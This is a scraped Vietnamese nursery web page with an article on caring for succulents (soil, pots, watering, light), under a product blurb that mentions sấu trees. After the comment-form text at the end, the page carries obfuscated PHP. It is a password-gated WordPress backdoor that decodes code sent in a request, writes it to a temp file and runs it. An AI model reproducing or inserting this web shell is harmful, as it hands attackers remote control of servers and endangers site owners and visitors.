Cách chăm sóc cây sen đá để cây luôn xanh đẹp

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cách chăm sóc cây sen đá – Sen đá là một loại cây cảnh được nhiều người ưa thích và sử dụng. Với ngoại hình nhỏ nhắn và khả năng sinh tồn tốt mà không đòi hỏi sự chăm sóc tỉ mỉ của người trồng, cây sen đá đã trở thành loại cây cảnh để bàn, cây trang trí nội thất được nhiều người yêu thích. Trong bài viết dưới đây, cùng tìm hiểu cách chăm sóc cây sen đá sao cho cây phát triển và tươi tốt nhất nhé. 

Đặc điểm của cây sen đá

Cây sen đá thuộc họ xương rồng mọng nước, là giống cây nhỏ hầu như không thấy thân mà chỉ thấy lá. Lá cây thường dày, mọng nước và đặc biệt xếp từng lớp từng lớp giống hình bông sen. Vì vậy loài cây có tên gọi là sen đá. 

Các loại sen đá đẹp
Các loại sen đá đẹp

Cây sen đá là loài cây rất dễ trồng, có thể sống tốt tại những vùng đất khô cằn, thiếu chất dinh dưỡng như vùng núi đá, sa mạc… Chúng có thể thích nghi với nhiều loại khí hậu khác nhau và sống quanh năm, khi lá cây rụng có thể nảy chồi từ đó và mọc ra cây mới. 

Tại Việt Nam hiện nay có rất nhiều các loại sen đá khác nhau và được ưa chuộng vì ngoại hình xinh xắn cũng như kỹ thuật trồng rất đơn giản. 

Ý nghĩa của cây sen đá

Với đặc điểm sức sống mạnh mẽ và có thể tồn tại được trong những hoàn cảnh khó khăn nhất, sen đá là loại cây biểu tượng cho tình yêu bền vững, thủy chung và không bị thay đổi theo hoàn cảnh hay thời gian. 

Giống với vẻ ngoài mộc mạc và đơn giản của mình, sen đá ý chỉ về một tình yêu nhẹ nhàng, trong sáng thuần khiết nhưng lại vô cùng bền chặt với thời gian và hoàn cảnh, sẵn sàng đối diện với khó khăn thử thách. 

Với ý nghĩa của cây sen đá như vậy mà đây cũng được xem là một phần quà ý nghĩa dành tặng cho những người thân yêu hay các cặp tình nhân. 

Bên cạnh đó, sen đá còn biểu tượng cho ý chí mạnh mẽ, sẵn sàng đương đầu với khó khăn thử thách. 

cách chăm sóc sen đá
Ý nghĩa của cây sen đá

Cách chăm sóc cây sen đá

Để có một cây sen đá tươi tốt người trồng cần lưu ý một số điều cần thiết để chăm sóc cây sen đá đúng cách nhất.

Đất trồng 

Với việc chuẩn bị đất trồng cây sen đá, bạn nên chọn loại đất thông thoáng, có khả năng thoát nước tốt vì cây sen đá không chịu được trong môi trường ẩm ướt quá lâu. Tốt nhất nên dùng hỗn hợp tro trấu trộn với phân bò và cùng với các loại đất cát để có phần đất trồng phù hợp nhất với loại cây này. 

Chậu cây

Chậu cây cũng là một vấn đề cần lưu ý khi trồng cây sen đá. Nên chọn các loại chậu có lỗ thoát nước trong trường hợp cây bị tưới quá nhiều nước sẽ có lỗ thoát nước ở phần chậu cây khiến cây không bị ngập úng. Nên chọn các loại chậu có khả năng thoát nước tốt để rễ cây không bị úng thối. 

Nước

Sen đá là loại cây ưa nóng, khô và nhiều nắng. Vì vậy, phụ thuộc vào tình hình thời tiết mà tưới cây sao cho cây đủ ẩm và không bị đọng lại quá nhiều nước trên lá và rễ cây. Chỉ nên dùng nước máy hoặc nước giếng thông thường để tưới cho sen đá. Tưới nước cho ngấm đủ xuống rễ cây khoảng ¾ chậu hoa, không nên để nước đọng lên ngọn cây nếu để cây nơi nhiệt độ thấp vì như vậy sẽ gây úng lá.

Hoa sen đá trên bàn làm việc
Cách chăm sóc cây sen đá

Khi cây sen đá đã phát triển ổn định chỉ cần tưới nước 2 – 4 lần 1 tuần trong thời tiết khô hanh, những ngày mưa mát mẻ thì chỉ cần 1 đến 2 lần một tuần. Lượng nước tưới nhiều hay ít cũng tùy thuộc vào loại đất trồng. Đất thịt như đất phù sa, đất mùn thì khả năng giữ nước tốt, thoát nước kém nên chỉ cần tưới nước 3-4 ngày một lần.

Với những loại chậu cây nhỏ dùng để trưng trong nhà, ít nắng, ít gió thì chỉ cần tưới cây khi thấy đất có dấu hiệu bị khô và khi nhấc chậu lên thấy nhẹ hẳn. 

Với các cây ở ngoài trời và vào mùa mưa, cần chú ý cho cây vào trong nhà tránh tình trạng mưa quá lâu khiến cây bị ngập nước. Hạn chế rải sỏi lên mặt chậu. Sỏi sẽ chặn quá trình bốc hơi nước, vô tình làm úng rễ. Các bạn có thể thay sỏi bằng viên đất nung để cố định gốc cây mà vẫn đảm bảo thoát nước tốt.

Ánh sáng 

Cuối cùng, ánh sáng là một phần rất cần thiết cho sự phát triển của cây sen đá. Nếu bạn để cây ở nơi có nhiều ánh sáng, nhất là ánh sáng của buổi sáng sớm và buổi chiều tối cây sẽ được hấp thụ đầy đủ các chất dinh dưỡng. Nếu bạn để trong phòng không có ánh sáng hãy mang ra nắng ít nhất 8h. 

Chú ý: Nắng rất cần thiết những không có nghĩa là cứ càng nắng càng tốt, Sen đá cần nắng không có nghĩa là phơi cây và trưa nắng gắt, điều này khiến sen đá sẽ bị héo lá và mất nước, hãy che nắng cho cây vào những lúc nắng gắt.

 

Trên đây là một số thông tin cơ bản về cây sen đá và cách chăm sóc cây sen đá đúng cách. Nếu như bạn đang suy nghĩ muốn tìm một loại cây để trang trí cho căn phòng hoặc bàn làm việc thì cây sen đá là một lựa chọn phù hợp. 

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}